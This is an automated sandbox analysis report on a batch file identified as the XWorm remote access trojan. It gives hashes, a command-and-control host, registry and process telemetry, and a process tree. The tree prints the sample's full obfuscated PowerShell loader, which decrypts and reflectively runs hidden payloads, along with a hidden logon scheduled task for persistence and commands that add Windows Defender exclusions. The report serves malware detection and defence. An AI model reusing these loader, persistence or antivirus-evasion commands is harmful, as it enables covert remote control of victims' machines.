xworm | 1a158ec89f3a579cb370fce8c79de20c4943b84d584ff2f63d476209f3c29873

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
04/07/2024, 18:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Free.bat
Size

190KB
MD5

6a1fd175668c34faf07a9f82dcd61884
SHA1

b2232ad243c3596bc29716d085a6bc8ba328e12c
SHA256

1a158ec89f3a579cb370fce8c79de20c4943b84d584ff2f63d476209f3c29873
SHA512

e66d20eb6d80fea715096c073ff41ece7ca243ccc4dd5ccf216261c64147660bcfa780d044f4d9cdcb212ca65c2b4309ab07253cbbbcf8ef90706b03a729a2c3
SSDEEP

3072:f4UH4Z5TsZPHVN70jXQw0o26RdIrQGgjStDcejhbXvqR61dqWsjocgcsR3gTEcat:fDtVN70cwV2MIlrtD9bXCWqWgocIwbx4

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

executive-factory.gl.at.ply.gg:58101

Attributes

install_file
USB.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/3948-52-0x0000016DFAA80000-0x0000016DFAA98000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4608	powershell.exe
3212	powershell.exe
4076	powershell.exe
3284	powershell.exe
3948	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133645931197834071"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4076	powershell.exe
4076	powershell.exe
3284	powershell.exe
3284	powershell.exe
3948	powershell.exe
3948	powershell.exe
3592	chrome.exe
3592	chrome.exe
4608	powershell.exe
4608	powershell.exe
4608	powershell.exe
3212	powershell.exe
3212	powershell.exe
3212	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3592	chrome.exe
3592	chrome.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe
3948	powershell.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
660	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4076	powershell.exe
Token: SeDebugPrivilege	3284	powershell.exe
Token: SeIncreaseQuotaPrivilege	3284	powershell.exe
Token: SeSecurityPrivilege	3284	powershell.exe
Token: SeTakeOwnershipPrivilege	3284	powershell.exe
Token: SeLoadDriverPrivilege	3284	powershell.exe
Token: SeSystemProfilePrivilege	3284	powershell.exe
Token: SeSystemtimePrivilege	3284	powershell.exe
Token: SeProfSingleProcessPrivilege	3284	powershell.exe
Token: SeIncBasePriorityPrivilege	3284	powershell.exe
Token: SeCreatePagefilePrivilege	3284	powershell.exe
Token: SeBackupPrivilege	3284	powershell.exe
Token: SeRestorePrivilege	3284	powershell.exe
Token: SeShutdownPrivilege	3284	powershell.exe
Token: SeDebugPrivilege	3284	powershell.exe
Token: SeSystemEnvironmentPrivilege	3284	powershell.exe
Token: SeRemoteShutdownPrivilege	3284	powershell.exe
Token: SeUndockPrivilege	3284	powershell.exe
Token: SeManageVolumePrivilege	3284	powershell.exe
Token: 33	3284	powershell.exe
Token: 34	3284	powershell.exe
Token: 35	3284	powershell.exe
Token: 36	3284	powershell.exe
Token: SeIncreaseQuotaPrivilege	3284	powershell.exe
Token: SeSecurityPrivilege	3284	powershell.exe
Token: SeTakeOwnershipPrivilege	3284	powershell.exe
Token: SeLoadDriverPrivilege	3284	powershell.exe
Token: SeSystemProfilePrivilege	3284	powershell.exe
Token: SeSystemtimePrivilege	3284	powershell.exe
Token: SeProfSingleProcessPrivilege	3284	powershell.exe
Token: SeIncBasePriorityPrivilege	3284	powershell.exe
Token: SeCreatePagefilePrivilege	3284	powershell.exe
Token: SeBackupPrivilege	3284	powershell.exe
Token: SeRestorePrivilege	3284	powershell.exe
Token: SeShutdownPrivilege	3284	powershell.exe
Token: SeDebugPrivilege	3284	powershell.exe
Token: SeSystemEnvironmentPrivilege	3284	powershell.exe
Token: SeRemoteShutdownPrivilege	3284	powershell.exe
Token: SeUndockPrivilege	3284	powershell.exe
Token: SeManageVolumePrivilege	3284	powershell.exe
Token: 33	3284	powershell.exe
Token: 34	3284	powershell.exe
Token: 35	3284	powershell.exe
Token: 36	3284	powershell.exe
Token: SeIncreaseQuotaPrivilege	3284	powershell.exe
Token: SeSecurityPrivilege	3284	powershell.exe
Token: SeTakeOwnershipPrivilege	3284	powershell.exe
Token: SeLoadDriverPrivilege	3284	powershell.exe
Token: SeSystemProfilePrivilege	3284	powershell.exe
Token: SeSystemtimePrivilege	3284	powershell.exe
Token: SeProfSingleProcessPrivilege	3284	powershell.exe
Token: SeIncBasePriorityPrivilege	3284	powershell.exe
Token: SeCreatePagefilePrivilege	3284	powershell.exe
Token: SeBackupPrivilege	3284	powershell.exe
Token: SeRestorePrivilege	3284	powershell.exe
Token: SeShutdownPrivilege	3284	powershell.exe
Token: SeDebugPrivilege	3284	powershell.exe
Token: SeSystemEnvironmentPrivilege	3284	powershell.exe
Token: SeRemoteShutdownPrivilege	3284	powershell.exe
Token: SeUndockPrivilege	3284	powershell.exe
Token: SeManageVolumePrivilege	3284	powershell.exe
Token: 33	3284	powershell.exe
Token: 34	3284	powershell.exe
Token: 35	3284	powershell.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe
3592	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3948	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 956 wrote to memory of 4660	956	cmd.exe	82
PID 956 wrote to memory of 4660	956	cmd.exe	82
PID 956 wrote to memory of 4076	956	cmd.exe	83
PID 956 wrote to memory of 4076	956	cmd.exe	83
PID 4076 wrote to memory of 3284	4076	powershell.exe	84
PID 4076 wrote to memory of 3284	4076	powershell.exe	84
PID 4076 wrote to memory of 2964	4076	powershell.exe	88
PID 4076 wrote to memory of 2964	4076	powershell.exe	88
PID 2964 wrote to memory of 1988	2964	WScript.exe	89
PID 2964 wrote to memory of 1988	2964	WScript.exe	89
PID 1988 wrote to memory of 4004	1988	cmd.exe	91
PID 1988 wrote to memory of 4004	1988	cmd.exe	91
PID 1988 wrote to memory of 3948	1988	cmd.exe	92
PID 1988 wrote to memory of 3948	1988	cmd.exe	92
PID 3592 wrote to memory of 3124	3592	chrome.exe	95
PID 3592 wrote to memory of 3124	3592	chrome.exe	95
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 2076	3592	chrome.exe	96
PID 3592 wrote to memory of 1604	3592	chrome.exe	97
PID 3592 wrote to memory of 1604	3592	chrome.exe	97
PID 3592 wrote to memory of 3248	3592	chrome.exe	98
PID 3592 wrote to memory of 3248	3592	chrome.exe	98
PID 3592 wrote to memory of 3248	3592	chrome.exe	98
PID 3592 wrote to memory of 3248	3592	chrome.exe	98
PID 3592 wrote to memory of 3248	3592	chrome.exe	98
PID 3592 wrote to memory of 3248	3592	chrome.exe	98
PID 3592 wrote to memory of 3248	3592	chrome.exe	98
PID 3592 wrote to memory of 3248	3592	chrome.exe	98
PID 3592 wrote to memory of 3248	3592	chrome.exe	98
PID 3592 wrote to memory of 3248	3592	chrome.exe	98
PID 3592 wrote to memory of 3248	3592	chrome.exe	98
PID 3592 wrote to memory of 3248	3592	chrome.exe	98
PID 3592 wrote to memory of 3248	3592	chrome.exe	98
PID 3592 wrote to memory of 3248	3592	chrome.exe	98
PID 3592 wrote to memory of 3248	3592	chrome.exe	98

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Free.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+zjSrIMxPL0kKAr9W3toxccwQzWyMZriepviDP0no/o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rbDBIioNSfoiH9PVbdA+aw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JoGVC=New-Object System.IO.MemoryStream(,$param_var); $ZjFZT=New-Object System.IO.MemoryStream; $AfLKq=New-Object System.IO.Compression.GZipStream($JoGVC, [IO.Compression.CompressionMode]::Decompress); $AfLKq.CopyTo($ZjFZT); $AfLKq.Dispose(); $JoGVC.Dispose(); $ZjFZT.Dispose(); $ZjFZT.ToArray();}function execute_function($param_var,$param2_var){ $UzmAj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bJsJY=$UzmAj.EntryPoint; $bJsJY.Invoke($null, $param2_var);}$hDOyx = 'C:\Users\Admin\AppData\Local\Temp\Free.bat';$host.UI.RawUI.WindowTitle = $hDOyx;$cBaAx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($hDOyx).Split([Environment]::NewLine);foreach ($gLJDg in $cBaAx) { if ($gLJDg.StartsWith('aVQWClsjWLPGRZhZpVab')) { $zXwZB=$gLJDg.Substring(20); break; }}$payloads_var=[string[]]$zXwZB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
  2⤵
  PID:4660
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_683_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_683.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3284
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_683.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:2964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_683.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1988
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+zjSrIMxPL0kKAr9W3toxccwQzWyMZriepviDP0no/o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rbDBIioNSfoiH9PVbdA+aw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JoGVC=New-Object System.IO.MemoryStream(,$param_var); $ZjFZT=New-Object System.IO.MemoryStream; $AfLKq=New-Object System.IO.Compression.GZipStream($JoGVC, [IO.Compression.CompressionMode]::Decompress); $AfLKq.CopyTo($ZjFZT); $AfLKq.Dispose(); $JoGVC.Dispose(); $ZjFZT.Dispose(); $ZjFZT.ToArray();}function execute_function($param_var,$param2_var){ $UzmAj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bJsJY=$UzmAj.EntryPoint; $bJsJY.Invoke($null, $param2_var);}$hDOyx = 'C:\Users\Admin\AppData\Roaming\Windows_Log_683.bat';$host.UI.RawUI.WindowTitle = $hDOyx;$cBaAx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($hDOyx).Split([Environment]::NewLine);foreach ($gLJDg in $cBaAx) { if ($gLJDg.StartsWith('aVQWClsjWLPGRZhZpVab')) { $zXwZB=$gLJDg.Substring(20); break; }}$payloads_var=[string[]]$zXwZB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        5⤵
        
        PID:4004
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3948
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4608
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99cc7ab58,0x7ff99cc7ab68,0x7ff99cc7ab78
  2⤵
  PID:3124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1756 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:2
  2⤵
  PID:2076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:8
  2⤵
  PID:1604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2300 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:8
  2⤵
  PID:3248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2836 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:1
  2⤵
  PID:4740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2844 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:1
  2⤵
  PID:2640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4332 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:1
  2⤵
  PID:448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:8
  2⤵
  PID:4420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4776 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:8
  2⤵
  PID:3768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4748 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:1
  2⤵
  PID:1272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4984 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:1
  2⤵
  PID:228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3360 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:8
  2⤵
  PID:3284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3260 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:8
  2⤵
  PID:2240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3136 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:8
  2⤵
  PID:4044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3304 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:1
  2⤵
  PID:3744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3196 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:1
  2⤵
  PID:1740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=2956 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:1
  2⤵
  PID:2916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1908 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:2
  2⤵
  PID:3576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=2852 --field-trial-handle=1944,i,2686691829019361381,12246092841627697547,131072 /prefetch:1
  2⤵
  PID:4396

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
a7dedfc338c6b4e1b9722afd3a57dbd4

SHA1
cf20ec6c545c211b85d5f45177b0751f3c57ee1b

SHA256
